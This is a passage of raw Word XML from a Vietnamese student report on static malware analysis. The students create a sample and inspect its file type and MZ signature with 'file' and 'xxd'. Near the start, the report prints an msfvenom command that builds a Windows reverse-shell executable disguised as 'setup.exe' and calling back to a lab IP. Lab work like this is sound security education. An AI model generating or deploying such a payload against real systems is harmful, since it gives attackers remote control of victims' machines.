        <w:t>II.Xây dựng môi trường</w:t>
      </w:r>
      <w:r w:rsidR="007D0995" w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="40CB8FD4" w14:textId="47A762E5" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00EE0876" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc150717770"/>
      <w:bookmarkStart w:id="16" w:name="_Toc150718032"/>
      <w:bookmarkStart w:id="17" w:name="_Toc150718119"/>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lựa chọn mẫu mã độc</w:t>
      </w:r>
      <w:r w:rsidR="007D0995" w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và công cụ</w:t>
      </w:r>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sử dụng để phân tích</w:t>
      </w:r>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="5C59A08A"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Trong bài báo cáo lớn này , nhóm bọn em sẽ sử dụng mã độc có tên là “setup.exe” được tạo từ công cụ “Msfvenom” được tích hợp sẵn trong hệ điều hành Kali linux.Sử dụng lệnh sau để tại mẫu mã độc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7570B6E1" w14:textId="2C715F95" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>+msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.10.136 LPORT=8080 -f exe -o setup.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0024D366"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3CABBA8D" wp14:editId="2320778F">
            <wp:extent cx="5731200" cy="9271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927100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCE94B2"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gt;Kết quả : file “setup.exe” được tạo thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD082B1"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Công cụ bọn em sử dụng để tiến hành phân tích tĩnh mẫu mã độc là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03328C48" w14:textId="273B7DE0"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Các công cụ dòng lệnh được tích hợp sẵn trong hệ điều hành Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3855A15F" w14:textId="3058AEE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Api monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481C7FCB"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Công cụ sử dụng để phân tích mẫu mã độc tự động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085F7720" w14:textId="553A940E"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Yara</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5169BB13" w14:textId="434EC982"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Virustotal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603AA76F" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45363DDE" w14:textId="591678CC" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc150717771"/>
      <w:bookmarkStart w:id="19" w:name="_Toc150718033"/>
      <w:bookmarkStart w:id="20" w:name="_Toc150718120"/>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>III.Quá trình phân tích tĩnh</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C" w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="37F0A3B9" w14:textId="14D63469" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc150717772"/>
      <w:bookmarkStart w:id="22" w:name="_Toc150718034"/>
      <w:bookmarkStart w:id="23" w:name="_Toc150718121"/>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.Xác định loại của tệp</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C" w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="25C5BCDC"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Việc xác định loại tệp sẽ tiết lộ thông tin quan trọng như hệ điều hành điều hành mục tiêu.Sử dụng lệnh “file” để xác định loại của mẫu mã độc vừa tạo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEB16CB" w14:textId="54CBC365"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file setup.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED63F8A"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2F97759A" wp14:editId="608767D0">
            <wp:extent cx="5731200" cy="4318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731200" cy="431800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C506A25"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gt;Kết quả : File “setup.exe” có các tính chất sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6405058D" w14:textId="3A9FFAB6" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">+định dạng mở rộng: “.exe” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2D2A8" w14:textId="2661DC87" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+“executable” : nó là một dạng file thực thi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48481A" w14:textId="1355FAAA" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Kiến trúc nền tảng: x86-64 : chạy trên nền tảng x32bit hoặc x64bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202FBD1" w14:textId="647E1A81" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+“for MS Windows” : file này được sử dụng để chạy trên hệ điều hành Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078349D6" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52B4401A" w14:textId="79047240" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=&gt;Kết luận : mẫu mã độc “setup.exe” là một dạng file thực thi và nhắm mục tiêu vào các hệ thống chạy hệ điều hành Windows có kiến trúc nền tảng x64bit</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C0979" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D4539B" w14:textId="78A5503F" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc150717773"/>
      <w:bookmarkStart w:id="25" w:name="_Toc150718035"/>
      <w:bookmarkStart w:id="26" w:name="_Toc150718122"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.Xác định chữ ký tệp (File Signature)</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="5C982352"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Chữ ký tệp (File Signature): có thể được sử dụng để xác định loại tệp, thay cho phần mở rộng tệp. Chữ ký tệp là trình tự byte duy nhất được viết vào phần đầu tệp. Các tệp khác nhau có chữ ký khác nhau có thể được sử dụng để xác định loại tệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538FDB9A" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E8827A"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 xml:space="preserve">-Danh sách các chữ ký tệp nhóm bọn em sẽ tham khảo từ nguồn sau : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E272DE" w14:textId="48D8EA1D" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00717B9C" w:rsidRPr="00A0472E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/List_of_file_signatures</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D5B61" w14:textId="097F1BA5" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>+</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00717B9C" w:rsidRPr="00A0472E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Portable_Executable</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8782F0" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B714D9"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Sử dụng công cụ “xxd” để kiểm tra File Signature của file “setup.exe” vừa tạo.Sử dụng lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA76C46" w14:textId="7F013C8B"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xxd setup.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F1900C"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45A692B8" wp14:editId="225775DC">
            <wp:extent cx="5731200" cy="14859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31200" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2FF54D"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gt;Kết quả : 2 bytes đầu tiên của file này có hex và giá trị tương ứng là là “4d 5a” - “MZ”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E255C0" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">00000000: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>4d5a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9000 0300 0000 0400 0000 ffff 0000  </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>MZ</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>..............</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66008B3A"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gt;So sánh với “List_of_file_signatures” tham khảo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA202A"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="10514AAC" wp14:editId="19AA627B">
            <wp:extent cx="5729288" cy="22955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29288" cy="2295525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E0BAE8" w14:textId="6D7C8F3D" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=&gt;Kết luận:Như vậy dựa trên việc phân tích File Signature có thể kết luận rằng mẫu mã độc được tạo là thực thi có định dạng exe</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F3358" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E11815F"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Ngoài xác định được định dạng file dựa trên phân tích File Signature , nhóm bọn em có thể phát hiện ra được nền tảng của mẫu mã độc này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D0184"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3890D2CA" wp14:editId="26F35B83">
            <wp:extent cx="5731200" cy="4572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731200" cy="457200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
